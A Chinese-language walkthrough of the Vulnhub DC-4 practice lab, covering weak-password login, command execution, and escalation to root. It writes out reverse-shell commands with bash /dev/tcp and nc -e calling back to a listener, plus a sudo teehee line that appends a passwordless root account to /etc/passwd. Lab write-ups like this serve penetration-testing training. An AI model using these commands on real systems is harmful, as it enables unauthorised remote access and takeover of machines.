zoukankan      html  css  js  c++  java
  • Vulnhub DC4

    简介

    DC-4是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。与以前的DC版本不同,这个版本主要是为初学者/中级用户设计的。只有一个flag,但从技术上讲,有多个入口点,就像上次一样,没有任何线索。Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。对于初学者来说,Google可以提供很大的帮助。

    getshell

    熟悉的登录框

    发现弱口令一枚

    登入后台后发先有个发送命令的command.php,白捡的命令执行

    反弹shell

    bash -i >& /dev/tcp/192.168.43.201/4444 0>&1

    不知道为啥反弹失败,尝试nc反弹shell成功

    nc -e /bin/sh 192.168.43.201 4444

    提权

    收集一下信息

    id
    uname -a
    cat /etc/*release
    

    msf搜一下有没有相应的提权洞,未果。

    然后 cat /etc/passwd发现了有几个用户

    去home目录翻一翻有没有什么好东西,然后就在jim的目录中翻到了一个老密码表

    将里面所有密码复制下来保存,然后爆破ssh

    成功找到了jim的密码,现在去登陆jim的账户

    看了一下mbox,是root给jim发的邮件

    但是只是一个测试,没什么卵用。但是在/var/mail又看到一封邮件,里面有密码信息

    得到了charles的密码,现在去登陆charles,直接切换用户 su charles

    登陆了过后sudo -l发现有惊喜

    发现可以不需要密码以管理员身份运行teehee命令 ,直接百度一下teehee提权

    echo "test::0:0:test:/home:/bin/bash" | sudo teehee -a /etc/passwd

    写入/etc/passwd后查看

    然后直接切换test用户即可提权成功 su test

    总结

    • 1.爆破进入后台

    • 2.命令执行漏洞

    • 3.收集密码表

    • 4.teehee提权,写入/etc/passwd文件中

      /etc/passwd中的含义

      root:x:0:0:root:/root:/bin/bash对应如下

      用户名:密码(x代表加密密码):UID:GID:用户全名或本地账号:家目录:登陆后的终端命令

  • 相关阅读:
    笔记:Oracle查询重复数据并删除,只保留一条记录
    64位系统安装ODBC驱动的方法
    批量Excel数据导入Oracle数据库
    Oracle自我补充之Decode()函数使用介绍
    解决nginx: [error] open() "/usr/local/nginx/logs/nginx.pid" failed错误
    Linux命令区
    Linux下安装PHP+Nginx+Msql
    Thinkphp时间转换与统计的问题
    phpStydy配置memcache扩展
    Thinkphp+Nginx(PHPstudy)下报的404错误,403错误解决
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13955822.html
Copyright © 2011-2022 走看看